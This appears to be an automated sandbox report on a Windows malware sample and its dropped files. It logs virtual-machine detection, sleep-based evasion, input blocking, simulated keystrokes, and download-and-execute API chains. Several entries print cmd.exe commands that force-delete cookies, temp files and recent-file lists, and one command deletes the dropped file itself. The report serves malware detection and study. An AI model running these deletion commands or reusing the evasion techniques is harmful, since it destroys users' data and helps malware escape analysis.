Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00003C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000280A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000500A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000C0A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000380A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000200A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000441	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000081D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041D	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000045A	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041E	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000041F	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\00000422	Jump to behavior
Source: C:\Windows\Temp\ .exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layouts\0000042A	Jump to behavior

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Source: C:\Windows\Temp\ .exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem WHERE Name="user-PC"

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\server.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\Temp\v5.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\033726\svchost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405302
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_0040263E FindFirstFileA,	0_2_0040263E
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Code function: 0_2_00405CD8 FindFirstFileA,FindClose,	0_2_00405CD8
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	3_2_10001A20
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	3_2_100014B0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	3_2_10008B50
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	3_2_10008520
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,	3_2_10008E40
Source: C:\Windows\Temp\server.exe	Code function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	3_2_100086F0
Source: C:\Windows\Temp\server.exe	Code function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	3_2_10008F00
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,	5_2_0045B051
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,	5_2_00405260
Source: C:\Windows\Temp\ .exe	Code function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,	5_2_00439D40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,	8_2_10001A20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,	8_2_10008B50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,	8_2_100014B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,	8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,	8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,	8_2_10008F00

Source: C:\Windows\Temp\server.exe

3_2_1000AA30

Source: C:\Windows\Temp\v5.exe

2_2_00406090

Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 1200000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 60000	Jump to behavior
Source: C:\Windows\Temp\server.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe	Thread delayed: delay time: 180000

Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior
Source: C:\Windows\Temp\ .exe	File opened: C:\Users\user	Jump to behavior

Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: server.exe, 00000003.00000002.2683900710.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: lSTORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: .exe.0.dr	Binary or memory string: 00-50-56 VMWare, Inc.
Source: v5.exe, 00000002.00000002.1330252488.0000000000794000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}}
Source: .exe.0.dr	Binary or memory string: 00-1C-14 VMware, Inc
Source: .exe.0.dr	Binary or memory string: 00-0C-29 VMware, Inc.
Source: svchost.exe, 00000008.00000002.2659797363.0000000000885000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWF
Source: .exe.0.dr	Binary or memory string: 00-05-69 VMWARE, Inc.
Source: .exe, 00000005.00000003.1360796714.0000000002456000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 00-1C-14 VMware, IncG
Source: svchost.exe, 00000008.00000002.2651704250.000000000084C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000002.00000002.1330252488.000000000076D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\v5.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\Temp\server.exe

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F3A0 BlockInput,BlockInput,

3_2_1000F3A0

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Temp\server.exe

3_2_100018A0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405CFF

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc,

3_2_00401000

Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F257 SetUnhandledExceptionFilter,		5_2_0044F257
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0044F26B SetUnhandledExceptionFilter,		5_2_0044F26B

Contains functionality to simulate keystroke presses

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Contains functionality to simulate mouse events

Source: C:\Windows\Temp\server.exe

Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event,

3_2_1000F840

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"	Jump to behavior
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"	Jump to behavior
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul	Jump to behavior
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit	Jump to behavior
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit	Jump to behavior
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"

Source: C:\Windows\Temp\ .exe

5_2_00401680

Source: C:\Windows\Temp\ .exe

5_2_00401680

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\Temp\server.exe

Code function: 3_2_10025DC0 cpuid

3_2_10025DC0

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\Temp\ .exe	Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA,	5_2_0045F814
Source: C:\Windows\Temp\ .exe	Code function: GetThreadLocale,GetLocaleInfoA,GetACP,	5_2_00401060
Source: C:\Windows\Temp\ .exe	Code function: GetLocaleInfoA,	5_2_00451400

Queries the installation date of Windows

Source: C:\Windows\Temp\ .exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\Temp\ .exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Windows\Temp\v5.exe

